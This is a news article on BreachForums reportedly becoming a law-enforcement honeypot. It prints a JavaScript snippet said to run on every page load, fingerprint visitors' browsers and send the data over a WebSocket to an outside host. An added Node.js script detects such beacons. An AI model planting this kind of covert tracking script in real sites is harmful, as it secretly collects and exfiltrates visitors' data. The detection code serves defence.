The threat actor collective ShinyHunters has recently announced that BreachForums—one of the most prolific breeding grounds for stolen credentials and leak data—has been commandeered by international law enforcement agencies.
According to Shiny from ShinyHunters, the site’s administrative controls, including the accounts “Hollow,” “ShinyHunters,” and the original “Founder,” now operate under the oversight of French authorities in coordination with the FBI.
Initial reports suggest that users attempting to log in to the forum are unknowingly submitting their credentials and device fingerprints into a sophisticated honeypot designed to trace and identify criminal actors.
BreachForums first emerged as a successor to several defunct leak-sharing platforms, quickly attracting cybercriminals by offering an encrypted messaging system and built-in scraping tools to harvest breached databases automatically.
Its primary attack vectors included SQL injection exploits against poorly secured partner sites and a proprietary botnet that distributed phishing kits.
Hackmanac analysts identified anomalous traffic patterns and injection payloads embedded in login redirects as early as July 2025, suggesting that site modifications were underway to convert the forum into a trap for its own user base.
The impact on the underground economy is profound: data sellers and leakers are now reluctant to share or purchase sensitive information, fearing exposure.
Victims of credential stuffing campaigns may see an uptick in targeted enforcement operations, as honeypot captures provide actionable intelligence on device fingerprints, IP geolocation, and intrusion tools.
The initiative reflects a broader trend of law enforcement leveraging deception operations to disrupt cybercrime ecosystems.
Infection Mechanism and Honeypot Payloads
Delving deeper into BreachForums’ transformation, the honeypot injects a stealth JavaScript snippet into every served page.
This script silently fingerprints browsers and exfiltrates session information via an encrypted WebSocket channel:
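    // Figure 1: honeypot_architecture.png
    (function() {
      // Open a TLS-protected WebSocket to the collection endpoint
      const socket = new WebSocket("wss://leaktrack.law/honeypot");
      socket.onopen = () => {
        // Fingerprint fields gathered from the visitor's browser
        const fingerprint = {
          ua: navigator.userAgent,
          plugins: navigator.plugins.length,
          time: Date.now()
        };
        // Send the fingerprint as base64-encoded JSON
        socket.send(btoa(JSON.stringify(fingerprint)));
      };
      socket.onmessage = (evt) => {
        // Server replies are base64-encoded as well
        console.log("Honeypot response:", atob(evt.data));
      };
    })();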
This payload executes immediately upon page load, collecting user-agent strings, installed plugin counts, and precise timestamps before transmitting them to law enforcement servers.
Additional persistence tactics include dynamically generated iframe embeds that reconnect every five minutes, ensuring that even passive visitors are continuously monitored.
Through this design, the authorities can correlate login attempts with real-world identities, effectively turning BreachForums into a digital dragnet.
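A beacon of the kind shown above can be recognised in captured browser traffic. The following is an added example, not code from the article or from the forum: it flags outbound WebSocket frames that go to a host other than the page's own and decode to base64-wrapped JSON carrying the "ua", "plugins" and "time" fields. The host forum.example, the function names and the sample frames are constructed assumptions.

```javascript
// Added example: triage of captured outbound WebSocket frames (Node.js).
// Field names come from the snippet quoted on the page; everything else is constructed.
const FINGERPRINT_KEYS = ["ua", "plugins", "time"];

// Decode a frame as base64-wrapped JSON; return null for anything else.
function decodeBase64Json(payload) {
  const looksBase64 = typeof payload === "string" &&
    payload.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(payload);
  if (!looksBase64) return null;
  try {
    const obj = JSON.parse(Buffer.from(payload, "base64").toString("utf8"));
    return obj !== null && typeof obj === "object" && !Array.isArray(obj) ? obj : null;
  } catch {
    return null; // valid base64, but not JSON
  }
}

// Classify one outbound frame seen while a page was loaded.
function inspectFrame(pageUrl, socketUrl, payload) {
  const page = new URL(pageUrl);
  const sock = new URL(socketUrl);
  const crossHost = page.hostname !== sock.hostname;
  const decoded = decodeBase64Json(payload);
  const matched = decoded ? FINGERPRINT_KEYS.filter((k) => k in decoded) : [];
  // Flag only when the data leaves the page's host AND looks like a fingerprint.
  return { socketHost: sock.hostname, crossHost, matched,
           suspicious: crossHost && matched.length >= 2 };
}

// Constructed sample frames: one beacon, one ordinary same-host message.
const sampleBeacon = Buffer.from(JSON.stringify({
  ua: "Mozilla/5.0 (X11; Linux x86_64)", plugins: 3, time: 1700000000000,
})).toString("base64");
const sampleChat = JSON.stringify({ type: "ping" });

function demo() {
  return [
    inspectFrame("https://forum.example/login", "wss://leaktrack.law/honeypot", sampleBeacon),
    inspectFrame("https://forum.example/login", "wss://forum.example/chat", sampleChat),
  ];
}

console.log(demo());
```

The same check can run over frames exported from a proxy or browser developer tools; the two-field threshold is an arbitrary choice for this example.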
The post ShinyHunters Unveils That BreachForums Taken by Law Enforcement Agencies, Now It Is a Honeypot appeared first on Cyber Security News.